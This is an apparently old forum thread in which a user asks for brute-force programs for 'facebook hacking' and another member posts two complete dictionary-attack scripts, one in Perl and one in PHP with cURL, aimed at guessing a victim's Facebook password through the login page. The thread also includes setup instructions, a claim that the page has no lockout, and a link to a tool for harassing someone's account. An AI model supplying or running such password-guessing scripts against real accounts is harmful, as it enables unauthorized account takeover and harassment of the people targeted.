Requesting a bruteforce programme.

[outsider141]

Anyone know any bruteforce programmes worth downloading- or have any links?

Just for facebook hacking and such.

cheers,

Outsider141

[Allstar .ιllιlı.]

.....

And you think you can actually brute-force facebook with a simple program...

[outsider141]

Allegedly so.

[Ebonesser]

A guy called Edgard Chammas figured out that the login.php page on Facebook allows infinite login attempts, so he made this Pearl-scripted bot to be used with an own dictionary for bruteforcing

#!/usr/bin/perl
# Facebook Password Breaker by Edgard Chammas [454447415244]
# This program is for educational purposes only.
# The author is not responsible for whatever you do with this program.
# Feel free to distribute this code provided you don't delete this header.

use WWW::Mechanize;
print "\n";
print "**************************************************************\n";
print "* Facebook Password Breaker by Edgard Chammas [454447415244] *\n";
print "**************************************************************\n";
print "\n";
my $stop = 0;
my $foundPassword = "";
if($#ARGV != 1 ){
print "Usage: fpb.pl [Username] [Dictionary] \n";
}
else{
if (open(DAT, $ARGV[1])) {
my $URL = "https://login.facebook.com/login.php";
my $URL2 = "http://facebook.com/home.php";
my $proxy = "";
my $facebookUser = "email";
my $facebookPwd = "pass";
my $line = "";
my $lnum = 1;
my $mech = WWW::Mechanize->new; $mech->agent_alias( 'Windows IE 6' );
$mech->proxy(['https', 'http', 'ftp'], $proxy);
print "* Launching attack on user: \"$ARGV[0]\"\n\n";
while (($line = <DAT>) && (!$stop)) {
chomp($line); print "* Trying password \"$line\" => ";
my $respond = $mech->get($URL);
$mech->form_with_fields($facebookUser,$facebookPwd);
$mech->set_fields($facebookUser => $ARGV[0], $facebookPwd => $line);
$mech->click('login'); my $respond = $mech->get($URL2);
my $page = $mech->content;
if ($page =~ /Logout/i){
print "Succeded!\n";
$foundPassword = $line;
$stop = 1;
}
else{
print "Failed\n";
}
}
}
else{
print "* Couldn't open the dictionary file \"$ARGV[1]\"\n";
}
close(DAT);
if (!$stop){
print "\n* Password not found for user \"$ARGV[0]\"\n";
}
else{
print "\n* The password for \"$ARGV[0]\" is \"$foundPassword\"\n";
} print "\n";
print "*****************************************************************\n";
print "\n";
}

I hope this helps ^^,

[2dgreengiant]

Far as im aware if u enter the password wrong too many times it locks you out.

[Maisteri]

I just entered my pass like 10 times wrong at facebook.com/login.php and it didnt lock me out

[Ebonesser]

Yes, that's what I'm trying to say. It's not locking you out if you try it 1000 or even more times. Like if you try to log in many times directly from their homepage, then you would probably get prompted to wait for 15 min or so when typing it wrong like 3, 5 or 10 times

[TimmeH32]

I just entered my pass like 10 times wrong at facebook.com/login.php and it didnt lock me out

We are legion. Expect us.

Ahem.

I've tried to enter my password more than few times on facebook and it's locked me out, but as Ebonesser said, if someone did DO it.. Is it a different page, perhaps?

[Ebonesser]

If you can't pearl, then here's a php version of it:

<?php
################################
# FaceBook BruteForcer
################################
set_time_limit(0);
$username ="THE-VICTIMS-MAIL"; // username to bruteforce
$dictionary ="YOUR-DICTIONARY-FILE.txt"; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - Password found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>

Have an empty "cookie.txt"-file and your dictionary text-file in the same directory as this php-file in your host.
Hope this helps

[Ebonesser]

But outsider141, if you just want to irritate someone on facebook then I recommend Facebook freezer. I've uploaded it here: http://www.mmowned.com/forums/genera...faceboook.html

[Mirror]

We are legion. Expect us.

Ahem.

I've tried to enter my password more than few times on facebook and it's locked me out, but as Ebonesser said, if someone did DO it.. Is it a different page, perhaps?

Thats pretty gay. lol.

[chris010285]

lols in this thread...